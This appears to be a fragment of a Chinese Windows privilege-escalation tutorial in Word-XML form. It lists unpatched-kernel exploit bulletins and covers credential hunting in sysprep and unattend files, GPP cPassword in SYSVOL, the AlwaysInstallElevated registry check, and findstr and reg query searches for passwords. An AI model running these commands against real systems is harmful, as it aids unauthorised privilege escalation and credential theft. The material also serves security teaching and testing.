来查询系统信息而不需要修改任何设置。惊不惊喜，意不意外？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4%B8%BA%E4%BA%86%E7%AE%80%E5%8C%96%E6%93%8D%E4%BD%9C%EF%BC%8C%E8%B4%A1%E7%8C%AE%E7%A4%BE%E4%BC%9A%EF%BC%8C%E6%96%B9%E4%BE%BF%E5%A4%A7%E5%AE%B6%EF%BC%8C%E6%88%91%E5%86%99%E4%BA%86%E4%B8%80%E4%B8%AA%E8%87%AA%E5%8A%A8%E5%8C%96%E8%84%9A%E6%9C%AC%EF%BC%8C%E5%AE%83%E5%B0%86%E5%88%A9%E7%94%A8VMIC-%E6%94%B6%E9%9B%86%E4%BB%A5%E4%B8%8B%E4%BF%A1%E6%81%AF%EF%BC%9A%E8%BF%9B%E7%A8%8B%EF%BC%8C%E6%9C%8D%E5%8A%A1%EF%BC%8C%E7%94%A8%E6%88%B7%E5%B8%90%E6%88%B7%EF%BC%8C%E7%94%A8%E6%88%B7%E7%BB%84%EF%BC%8C%E7%BD%91%E7%BB%9C%E6%8E%A5%E5%8F%A3%EF%BC%8C%E7%A1%AC%E7%9B%98%E9%A9%B1%E5%8A%A8%E5%99%A8%E4%BF%A1%E6%81%AF%EF%BC%8C%E7%BD%91%E7%BB%9C%E5%85%B1%E4%BA%AB%E4%BF%A1%E6%81%AF%EF%BC%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E7%9A%84Windows-%E8%A1%A5%E4%B8%81%E7%A8%8B%E5%BA%8F%EF%BC%8C%E5%90%AF%E5%8A%A8%E6%97%B6%E8%BF%90%E8%A1%8C%E7%9A%84%E7%A8%8B%E5%BA%8F%EF%BC%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E8%BD%AF%E4%BB%B6%E5%88%97%E8%A1%A8%EF%BC%8C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E6%97%B6%E5%8C%BA%E4%BF%A1%E6%81%AF%E3%80%82" \o "为了简化操作，贡献社会，方便大家，我写了一个自动化脚本，它将利用VMIC 收集以下信息：进程，服务，用户帐户，用户组，网络接口，硬盘驱动器信息，网络共享信息，已安装的Windows 补丁程序，启动时运行的程序，已安装软件列表，操作系统和时区信息。"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为了简化操作，贡献社会，方便大家，我写了一个自动化脚本，它将利用VMIC 收集以下信息：进程，服务，用户帐户，用户组，网络接口，硬盘驱动器信息，网络共享信息，已安装的Windows 补丁程序，启动时运行的程序，已安装软件列表，操作系统和时区信息。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"%E4%BD%A0%E5%8F%AF%E4%BB%A5%E4%BB%8E%E8%BF%99%E9%87%8C%E4%B8%8B%E8%BD%BD%E6%88%91%E7%9A%84%E8%84%9A%E6%9C%AC" \o "你可以从这里下载我的脚本"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你可以从这里</w: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"http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank"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t>下载我的脚本</w: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"%E4%BD%A0%E4%B9%9F%E5%8F%AF%E4%BB%A5%E4%BB%8E%E8%BF%99%E9%87%8C%E4%B8%8B%E8%BD%BD%E6%88%91%E5%88%A9%E7%94%A8%E8%84%9A%E6%9C%AC%E6%94%B6%E9%9B%86%E7%9A%84%E4%BF%A1%E6%81%AF%E6%A0%B7%E6%9C%AC" \o "你也可以从这里下载我利用脚本收集的信息样本"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你也可以从这里下载我利用脚本收集的</w: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"http://www.fuzzysecurity.com/tutorials/files/Win7.html" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank"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t>信息样本</w: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105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0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"%CE%94t-for-t5-to-t6-Quick-Fails" \o "Δt for t5 to t6 - Quick Fails"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66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Δt for t5 to t6 - Quick Fails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7%BB%A7%E7%BB%AD%E5%90%8E%E7%BB%AD%E6%AD%A5%E9%AA%A4%E4%B9%8B%E5%89%8D%EF%BC%8C%E4%BD%A0%E5%BA%94%E8%AF%A5%E8%8A%B1%E4%B8%80%E7%82%B9%E6%97%B6%E9%97%B4%E5%9B%9E%E9%A1%BE%E4%BB%A5%E4%B8%8B%E5%88%9A%E6%89%8D%E6%89%80%E6%94%B6%E9%9B%86%E5%88%B0%E7%9A%84%E4%BF%A1%E6%81%AF%EF%BC%8C%E5%9B%A0%E4%B8%BA%E7%8E%B0%E5%9C%A8%E6%88%91%E4%BB%AC%E5%B7%B2%E7%BB%8F%E5%BE%97%E5%88%B0%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%A4%A7%E9%87%8F%E7%9A%84%E6%9C%89%E7%94%A8%E4%BF%A1%E6%81%AF%E4%BA%86" \o "继续后续步骤之前，你应该花一点时间回顾以下刚才所收集到的信息，因为现在我们已经得到操作系统大量的有用信息了."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继续后续步骤之前，你应该花一点时间回顾以下刚才所收集到的信息，因为现在我们已经得到操作系统大量的有用信息了.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5%B0%BD%E7%AE%A1%E5%B7%B2%E7%BB%8F%E9%80%9A%E8%BF%87%E6%88%91%E7%9A%84WMIC-%E8%84%9A%E6%9C%AC%E6%94%B6%E9%9B%86%E5%88%B0%E4%B8%BB%E6%9C%BA%E7%9A%84%E8%A1%A5%E4%B8%81%E4%BF%A1%E6%81%AF%E4%BA%86%EF%BC%8C%E4%BD%86%E6%98%AF%E6%88%91%E4%BB%AC%E4%BB%8D%E7%84%B6%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%91%BD%E4%BB%A4%E6%9D%A5%E6%89%8B%E5%8A%A8%E6%94%B6%E9%9B%86%E3%80%82" \o "尽管已经通过我的WMIC 脚本收集到主机的补丁信息了，但是我们仍然可以通过下面的命令来手动收集。"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尽管已经通过我的WMIC 脚本收集到主机的补丁信息了，但是我们仍然可以通过下面的命令来手动收集。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"/>
        <w:gridCol w:w="8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wmic qfe get Caption,Description,HotFixID,InstalledOn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Caption                                     Description      HotFixID   InstalledOn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http://support.microsoft.com/?kbid=2727528  Security Update  KB2727528  11/23/2013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http://support.microsoft.com/?kbid=2729462  Security Update  KB2729462  11/26/2013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http://support.microsoft.com/?kbid=2736693  Security Update  KB2736693  11/26/2013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http://support.microsoft.com/?kbid=2737084  Security Update  KB2737084  11/23/2013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http://support.microsoft.com/?kbid=2742614  Security Update  KB2742614  11/23/2013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http://support.microsoft.com/?kbid=2742616  Security Update  KB2742616  11/26/2013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http://support.microsoft.com/?kbid=2750149  Update           KB2750149  11/23/2013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http://support.microsoft.com/?kbid=2756872  Update           KB2756872  11/24/2013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http://support.microsoft.com/?kbid=2756923  Security Update  KB2756923  11/26/2013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http://support.microsoft.com/?kbid=2757638  Security Update  KB2757638  11/23/2013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http://support.microsoft.com/?kbid=2758246  Update           KB2758246  11/24/2013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http://support.microsoft.com/?kbid=2761094  Update           KB2761094  11/24/2013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http://support.microsoft.com/?kbid=2764870  Update           KB2764870  11/24/2013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http://support.microsoft.com/?kbid=2768703  Update           KB2768703  11/23/2013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http://support.microsoft.com/?kbid=2769034  Update           KB2769034  11/23/2013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http://support.microsoft.com/?kbid=2769165  Update           KB2769165  11/23/2013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http://support.microsoft.com/?kbid=2769166  Update           KB2769166  11/26/2013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http://support.microsoft.com/?kbid=2770660  Security Update  KB2770660  11/23/2013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http://support.microsoft.com/?kbid=2770917  Update           KB2770917  11/24/2013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http://support.microsoft.com/?kbid=2771821  Update           KB2771821  11/24/2013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[..Snip..]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6%8F%90%E6%9D%83%E7%9A%84EXP-%E5%B0%B1%E9%82%A3%E4%B9%88%E5%87%A0%E4%B8%AA%EF%BC%8C%E5%8F%AF%E4%BB%A5%E6%9F%A5%E7%9C%8B%E4%B8%80%E4%B8%8B%E7%B3%BB%E7%BB%9F%E6%98%AF%E5%90%A6%E6%89%93%E6%9C%89%E7%9B%B8%E5%85%B3%E6%BC%8F%E6%B4%9E%E7%9A%84%E8%A1%A5%E4%B8%81%EF%BC%8C%E6%B2%A1%E6%89%93%E8%A1%A5%E4%B8%81%E5%B0%B1%E5%98%BF%E5%98%BF%E5%98%BF%E4%BA%86%EF%BC%8C%E5%B8%B8%E8%A7%81%E7%9A%84EXP%E6%9C%89%E8%BF%99%E4%BA%9B-%EF%BC%8C%E5%A4%A7%E5%AE%B6%E5%8F%AF%E4%BB%A5%E4%B8%8B%E8%BD%BD%E5%AF%B9%E5%BA%94%E7%89%88%E6%9C%AC%E7%9A%84Windows-%E8%AF%95%E8%AF%95%E8%BF%99%E4%BA%9BEXP%E3%80%82" \o "提权的EXP 就那么几个，可以查看一下系统是否打有相关漏洞的补丁，没打补丁就嘿嘿嘿了，常见的EXP有这些:，大家可以下载对应版本的Windows 试试这些EXP。"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提权的EXP 就那么几个，可以查看一下系统是否打有相关漏洞的补丁，没打补丁就嘿嘿嘿了，</w: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"https://github.com/SecWiki/windows-kernel-exploits" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank"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t>常见的EXP有这些:</w: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，大家可以下载对应版本的Windows 试试这些EXP。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"/>
        <w:gridCol w:w="8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52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#Security Bulletin   #KB     #Description    #Operating System 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MS17-017 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)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CVE-2017-8464 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)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CVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)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CVE-2018-0833   [SMBv3 Null Pointer Dereference Denial of Service]    (Windows 8.1/Server 2012 R2)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MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)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MS16-135 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)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MS16-111 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)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MS16-098 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)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MS16-075 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)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MS16-034 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)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MS16-032 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)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MS16-016 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)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MS16-014 　[K3134228]　　[remote code execution]　　(2008/Vista/7)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MS15-097 　[KB3089656]　　[remote code execution]　　(win8.1/2012)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MS15-076 　[KB3067505]　　[RPC]　　(2003/2008/7/8/2012)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MS15-077 　[KB3077657]　　[ATM]　　(XP/Vista/Win7/Win8/2000/2003/2008/2012)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MS15-061 　[KB3057839]　　[Kernel Driver]　　(2003/2008/7/8/2012)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MS15-051 　[KB3057191]　　[Windows Kernel Mode Drivers]　　(2003/2008/7/8/2012)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MS15-015 　[KB3031432]　　[Kernel Driver]　　(Win7/8/8.1/2012/RT/2012 R2/2008 R2)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MS15-010 　[KB3036220]　　[Kernel Driver]　　(2003/2008/7/8)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MS15-001 　[KB3023266]　　[Kernel Driver]　　(2008/2012/7/8)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MS14-070 　[KB2989935]　　[Kernel Driver]　　(2003)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MS14-068 　[KB3011780]　　[Domain Privilege Escalation]　　(2003/2008/2012/7/8)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MS14-058 　[KB3000061]　　[Win32k.sys]　　(2003/2008/2012/7/8)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MS14-040 　[KB2975684]　　[AFD Driver]　　(2003/2008/2012/7/8)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MS14-002 　[KB2914368]　　[NDProxy]　　(2003/XP)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MS13-053 　[KB2850851]　　[win32k.sys]　　(XP/Vista/2003/2008/win 7)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MS13-046 　[KB2840221]　　[dxgkrnl.sys]　　(Vista/2003/2008/2012/7)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MS13-005 　[KB2778930]　　[Kernel Mode Driver]　　(2003/2008/2012/win7/8)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MS12-042 　[KB2972621]　　[Service Bus]　　(2008/2012/win7)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MS12-020 　[KB2671387]　　[RDP]　　(2003/2008/7/XP)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MS11-080 　[KB2592799]　　[AFD.sys]　　(2003/XP)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MS11-062 　[KB2566454]　　[NDISTAPI]　　(2003/XP)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MS11-046 　[KB2503665]　　[AFD.sys]　　(2003/2008/7/XP)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MS11-011 　[KB2393802]　　[kernel Driver]　　(2003/2008/7/XP/Vista)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MS10-092 　[KB2305420]　　[Task Scheduler]　　(2008/7)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MS10-065 　[KB2267960]　　[FastCGI]　　(IIS 5.1, 6.0, 7.0, and 7.5)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MS10-059 　[KB982799]　　 [ACL-Churraskito]　　(2008/7/Vista)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MS10-048 　[KB2160329]　　[win32k.sys]　　(XP SP2 &amp; SP3/2003 SP2/Vista SP1 &amp; SP2/2008 Gold &amp; SP2 &amp; R2/Win7)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MS10-015 　[KB977165]　　 [KiTrap0D]　　(2003/2008/7/XP)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MS10-012 　[KB971468]　　[SMB Client Trans2 stack overflow]　　(Windows 7/2008R2)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MS09-050 　[KB975517]　　 [Remote Code Execution]　　(2008/Vista)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MS09-020 　[KB970483]　　 [IIS 6.0]　　(IIS 5.1 and 6.0)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MS09-012 　[KB959454]　　 [Chimichurri]　　(Vista/win7/2008/Vista)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MS08-068 　[KB957097]　　 [Remote Code Execution]　　(2000/XP)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MS08-067 　[KB958644]　　 [Remote Code Execution]　　(Windows 2000/XP/Server 2003/Vista/Server 2008)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MS08-066 　[KB956803]　　 [AFD.sys]　　(Windows 2000/XP/Server 2003)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MS08-025 　[KB941693]　　 [Win32.sys]　　(XP/2003/2008/Vista)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MS06-040 　[KB921883]　　 [Remote Code Execution]　　(2003/xp/2000)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MS05-039 　[KB899588]　　 [PnP Service]　　(Win 9X/ME/NT/2000/XP/2003)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MS03-026 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)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4%B8%8B%E4%B8%80%E4%B8%AA%E6%83%85%E6%99%AF%E6%98%AF%E5%A6%82%E6%9E%9C%E6%9F%90%E4%B8%AA%E7%8E%AF%E5%A2%83%E4%B8%AD%E6%9C%89%E5%A4%A7%E9%87%8F%E7%9A%84%E6%9C%BA%E5%99%A8%E9%9C%80%E8%A6%81%E8%A2%AB%E5%AE%89%E8%A3%85%EF%BC%8C%E9%82%A3%E4%B9%88%E6%8A%80%E6%9C%AF%E4%BA%BA%E5%91%98%E9%80%9A%E5%B8%B8%E4%B8%8D%E4%BC%9A%E4%B8%80%E4%B8%AA%E6%8E%A5%E4%B8%80%E4%B8%AA%E6%9C%BA%E5%99%A8%E7%9A%84%E5%8E%BB%E5%AE%89%E8%A3%85%EF%BC%8C%E4%BB%96%E4%BB%AC%E9%80%9A%E5%B8%B8%E4%BC%9A%E9%80%89%E6%8B%A9%E8%87%AA%E5%8A%A8%E5%8C%96%E5%AE%89%E8%A3%85%EF%BC%8C%E8%BF%99%E5%B0%B1%E5%8F%AF%E8%83%BD%E4%BC%9A%E9%81%97%E7%95%99%E4%B8%8B%E5%AE%89%E8%A3%85%E8%BF%87%E7%A8%8B%E7%9A%84%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%EF%BC%8C%E8%BF%99%E4%BA%9B%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%AD%E4%BC%9A%E5%8C%85%E5%90%AB%E8%AE%B8%E5%A4%9A%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%EF%BC%8C%E4%BE%8B%E5%A6%82%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%EF%BC%8C%E5%A6%82%E6%9E%9C%E8%83%BD%E5%BE%97%E5%88%B0%E8%BF%99%E4%BA%9B%E4%BF%A1%E6%81%AF%E5%B0%86%E6%9E%81%E5%A4%A7%E7%9A%84%E5%B8%AE%E5%8A%A9%E6%88%91%E4%BB%AC%E6%8F%90%E6%9D%83%E3%80%82" \o "下一个情景是如果某个环境中有大量的机器需要被安装，那么技术人员通常不会一个接一个机器的去安装，他们通常会选择自动化安装，这就可能会遗留下安装过程的配置文件，这些配置文件中会包含许多敏感信息，例如管理员账号密码，如果能得到这些信息将极大的帮助我们提权。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下一个情景是如果某个环境中有大量的机器需要被安装，那么技术人员通常不会一个接一个机器的去安装，他们通常会选择自动化安装，这就可能会遗留下安装过程的配置文件，这些配置文件中会包含许多敏感信息，例如管理员账号密码，如果能得到这些信息将极大的帮助我们提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"%E9%80%9A%E5%B8%B8%E8%BF%99%E4%BA%9B%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E4%BC%9A%E5%87%BA%E7%8E%B0%E5%9C%A8%E4%B8%8B%E9%9D%A2%E7%9B%AE%E5%BD%95%E4%B8%AD%EF%BC%9A" \o "通常这些敏感文件会出现在下面目录中："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通常这些敏感文件会出现在下面目录中：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="60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"/>
        <w:gridCol w:w="5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c:\sysprep.inf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c:\sysprep\sysprep.xml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%WINDIR%\Panther\Unattend\Unattended.xml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%WINDIR%\Panther\Unattended.xml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8%BF%99%E4%BA%9B%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E6%9E%81%E5%8F%AF%E8%83%BD%E5%8C%85%E5%90%AB%E6%98%8E%E6%96%87%E5%AF%86%E7%A0%81%EF%BC%8C%E4%B9%9F%E5%8F%AF%E8%83%BD%E4%BC%9A%E5%87%BA%E7%8E%B0base64-%E7%BC%96%E7%A0%81%E7%9A%84%E6%83%85%E5%86%B5%EF%BC%8C%E4%B8%8B%E9%9D%A2%E6%98%AF%E4%B8%80%E4%BA%9B%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E4%BA%8B%E4%BE%8B%EF%BC%9A" \o "这些配置文件极可能包含明文密码，也可能会出现base64 编码的情况，下面是一些配置文件的事例："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这些配置文件极可能包含明文密码，也可能会出现base64 编码的情况，下面是一些配置文件的事例：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"/>
        <w:gridCol w:w="8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34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# This is a sample from sysprep.inf with clear-text credentials.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[GuiUnattended]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OEMSkipRegional=1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OemSkipWelcome=1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AdminPassword=s3cr3tp4ssw0rd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TimeZone=20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# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people Base64 is not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encryption, I take more precautions to protect my coffee. The password here is "SuperSecurePassword".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&lt;LocalAccounts&gt;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&lt;LocalAccount wcm:action="add"&gt;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&lt;Password&gt;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    &lt;Value&gt;U3VwZXJTZWN1cmVQYXNzd29yZA==&lt;/Value&gt;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    &lt;PlainText&gt;false&lt;/PlainText&gt;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&lt;/Password&gt;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&lt;Description&gt;Local Administrator&lt;/Description&gt;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&lt;DisplayName&gt;Administrator&lt;/DisplayName&gt;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&lt;Group&gt;Administrators&lt;/Group&gt;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&lt;Name&gt;Administrator&lt;/Name&gt;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&lt;/LocalAccount&gt;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&lt;/LocalAccounts&gt;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# Sample from Unattended.xml with the same "secure" Base64 encoding.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&lt;AutoLogon&gt;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&lt;Password&gt;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&lt;Value&gt;U3VwZXJTZWN1cmVQYXNzd29yZA==&lt;/Value&gt;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&lt;PlainText&gt;false&lt;/PlainText&gt;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&lt;/Password&gt;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&lt;Enabled&gt;true&lt;/Enabled&gt;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&lt;Username&gt;Administrator&lt;/Username&gt;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&lt;/AutoLogon&gt;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GPO-%E9%A6%96%E9%80%89%E9%A1%B9%E6%96%87%E4%BB%B6%E5%8F%AF%E7%94%A8%E4%BA%8E%E5%9C%A8%E5%9F%9F%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E5%88%9B%E5%BB%BA%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7%EF%BC%8C%E5%BD%93%E4%BD%A0%E6%8E%A7%E5%88%B6%E7%9A%84%E4%B8%BB%E6%9C%BA%E8%BF%9E%E6%8E%A5%E5%9C%A8%E5%9F%9F%E4%B8%AD%E6%97%B6%EF%BC%8C%E9%82%A3%E4%B9%88%E5%B0%B1%E9%9D%9E%E5%B8%B8%E5%80%BC%E5%BE%97%E5%8E%BB%E7%9C%8B%E7%9C%8B%E5%AD%98%E5%82%A8%E5%9C%A8SYSVOL-%E4%B8%AD%E7%9A%84Groups-xml-%E6%96%87%E4%BB%B6%EF%BC%8C%E4%BB%BB%E4%BD%95%E7%BB%8F%E8%BF%87%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%9A%84%E7%94%A8%E6%88%B7%E9%83%BD%E5%8F%AF%E4%BB%A5%E8%AF%BB%E5%8F%96%E8%AF%A5%E6%96%87%E4%BB%B6%E3%80%82%E5%B0%BD%E7%AE%A1xml-%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84%E5%AF%86%E7%A0%81%E9%80%9A%E8%BF%87%E4%BD%BF%E7%94%A8AES-%E5%8A%A0%E5%AF%86%E6%9D%A5%E4%BF%9D%E8%AF%81%E5%AE%89%E5%85%A8%E6%80%A7%EF%BC%8C%E4%BD%86%E6%98%AF%E9%80%9A%E8%BF%87msdn-%E5%8F%91%E5%B8%83%E7%9A%84%E9%9D%99%E6%80%81%E5%AF%86%E9%92%A5%E5%8F%AF%E4%BB%A5%E5%BE%88%E8%BD%BB%E6%9D%BE%E7%9A%84%E8%A7%A3%E5%AF%86%E3%80%82" \o "GPO 首选项文件可用于在域计算机上创建本地用户，当你控制的主机连接在域中时，那么就非常值得去看看存储在SYSVOL 中的Groups.xml 文件，任何经过身份认证的用户都可以读取该文件。尽管xml 文件中的密码通过使用AES 加密来保证安全性，但是通过msdn 发布的静态密钥可以很轻松的解密。"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GPO 首选项文件可用于在域计算机上创建本地用户，当你控制的主机连接在域中时，那么就非常值得去看看存储在SYSVOL 中的Groups.xml 文件，任何经过身份认证的用户都可以读取该文件。尽管xml 文件中的密码通过使用AES 加密来保证安全性，但是通过msdn 发布的静态密钥可以很轻松的解密。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78" w:beforeAutospacing="0" w:after="178" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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857750" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="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"%E9%99%A4%E4%BA%86Groups-xml-%E4%BB%A5%E5%A4%96%EF%BC%8C%E5%85%B6%E4%BB%96%E5%87%A0%E4%B8%AA%E7%AD%96%E7%95%A5%E9%A6%96%E9%80%89%E9%A1%B9%E6%96%87%E4%BB%B6%E4%B9%9F%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8-%E2%80%9CcPassword%E2%80%9D-%E5%B1%9E%E6%80%A7" \o "除了Groups.xml 以外，其他几个策略首选项文件也可能存在 \“cPassword\” 属性"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除了Groups.xml 以外，其他几个策略首选项文件也可能存在 “cPassword” 属性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"/>
        <w:gridCol w:w="8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Services\Services.xml: Element-Specific Attributes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ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element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Printers\Printers.xml: SharedPrinter Element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Drives\Drives.xml: Element-Specific Attributes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DataSources\DataSources.xml: Element-Specific Attributes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"%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%8C%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E6%89%8B%E5%8A%A8%E6%B5%8F%E8%A7%88SYSVOL%E5%B9%B6%E8%8E%B7%E5%8F%96%E7%9B%B8%E5%85%B3%E6%96%87%E4%BB%B6%E6%9D%A5%E5%88%A9%E7%94%A8%E6%AD%A4%E6%BC%8F%E6%B4%9E%E3%80%82" \o "如下所示，可以通过手动浏览SYSVOL并获取相关文件来利用此漏洞。"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如下所示，可以通过手动浏览SYSVOL并获取相关文件来利用此漏洞。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78" w:beforeAutospacing="0" w:after="178" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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600700" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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9%99%A4%E4%BA%86%E4%B8%8A%E9%9D%A2%E6%89%8B%E5%8A%A8%E6%9F%A5%E6%89%BE%E9%A6%96%E9%80%89%E9%A1%B9%E6%96%87%E4%BB%B6%E4%B9%8B%E5%A4%96%EF%BC%8C%E6%88%91%E4%BB%AC%E4%B9%9F%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E6%9D%A5%E5%B8%AE%E5%8A%A9%E6%88%91%E4%BB%AC%E8%BE%BE%E5%88%B0%E7%9B%AE%E7%9A%84%E3%80%82" \o "除了上面手动查找首选项文件之外，我们也可以利用自动化工具来帮助我们达到目的。"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除了上面手动查找首选项文件之外，我们也可以利用自动化工具来帮助我们达到目的。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"/>
        <w:gridCol w:w="8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2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可以利用 msf 中的一个后渗透模块来实现自动化 [post/windows/gather/credentials/gpp](https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp)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6%8E%A5%E4%B8%8B%E6%9D%A5%E6%88%91%E4%BB%AC%E8%A6%81%E6%9F%A5%E6%89%BE%E4%B8%80%E4%B8%AA%E5%A5%87%E6%80%AA%E7%9A%84%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%AE%BE%E7%BD%AE-%E2%80%9CAlwaysInstallElevated%E2%80%9D-%E5%A6%82%E6%9E%9C%E5%90%AF%E5%8A%A8%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C%E5%AE%83%E4%BC%9A%E5%85%81%E8%AE%B8%E4%BB%BB%E4%BD%95%E7%94%A8%E6%88%B7%E5%B0%86-msi-%E6%96%87%E4%BB%B6%E5%AE%89%E8%A3%85%E4%B8%BANT-AUTHORITY-SYSTEM-%E3%80%82" \o "接下来我们要查找一个奇怪的注册表设置 \“AlwaysInstallElevated\” , 如果启动此设置，它会允许任何用户将 *.msi 文件安装为NT AUTHORITY \\ SYSTEM 。"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接下来我们要查找一个奇怪的注册表设置 “AlwaysInstallElevated” , 如果启动此设置，它会允许任何用户将 *.msi 文件安装为NT AUTHORITY \ SYSTEM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4%B8%BA%E4%BA%86%E8%83%BD%E5%A4%9F%E5%88%A9%E7%94%A8%E8%BF%99%E4%B8%AA%EF%BC%8C%E6%88%91%E4%BB%AC%E9%9C%80%E8%A6%81%E6%A3%80%E6%9F%A5%E4%B8%A4%E4%B8%AA%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%A1%B9%E6%98%AF%E5%90%A6%E5%B7%B2%E7%BB%8F%E8%AE%BE%E7%BD%AE%EF%BC%8C%E5%A6%82%E6%9E%9C%E5%9C%A8%E8%BF%99%E7%A7%8D%E6%83%85%E5%86%B5%E4%B8%8B%E6%88%91%E4%BB%AC%E8%83%BD%E5%A4%9F%E5%BC%B9%E5%87%BA-SYSTEM-shell-%E9%80%9A%E8%BF%87%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E6%9F%A5%E7%9C%8B%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%A1%B9%E6%98%AF%E5%90%A6%E5%90%AF%E5%8A%A8%E3%80%82%E4%B8%8D%E8%BF%87%E7%AC%94%E8%80%85%E6%B5%8B%E8%AF%95%E6%97%B6%E5%8F%91%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Windows7-%E5%B9%B6%E6%B2%A1%E6%9C%89%E8%BF%99%E4%B8%A4%E4%B8%AA%E9%94%AE%E5%80%BC%E3%80%82" \o "为了能够利用这个，我们需要检查两个注册表项是否已经设置，如果在这种情况下我们能够弹出 SYSTEM shell. 通过下面的命令可以查看注册表项是否启动。不过笔者测试时发现自己的Windows7 并没有这两个键值。"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为了能够利用这个，我们需要检查两个注册表项是否已经设置，如果在这种情况下我们能够弹出 SYSTEM shell. 通过下面的命令可以查看注册表项是否启动。不过笔者测试时发现自己的Windows7 并没有这两个键值。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"/>
        <w:gridCol w:w="82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# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.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reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated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reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated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"%E6%9C%80%E5%90%8E%E6%88%91%E4%BB%AC%E4%B9%9F%E5%8F%AF%E8%83%BD%E9%80%9A%E8%BF%87%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%91%BD%E4%BB%A4%E6%9D%A5%E6%8C%96%E5%88%B0%E6%9C%AA%E7%9F%A5%E7%9A%84%E5%AE%9D%E8%97%8F" \o "最后我们也可能通过下面的命令来挖到未知的宝藏"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最后我们也可能通过下面的命令来挖到未知的宝藏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"/>
        <w:gridCol w:w="8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# The command below will search the file system for file names containing certain keywords. You can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specify as many keywords as you wish.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dir /s *pass* == *cred* == *vnc* == *.config*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# Search certain file types for a keyword, this can generate a lot of output.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findstr /si password *.xml *.ini *.txt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# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".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reg query HKLM /f password /t REG_SZ /s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reg query HKCU /f password /t REG_SZ /s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105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
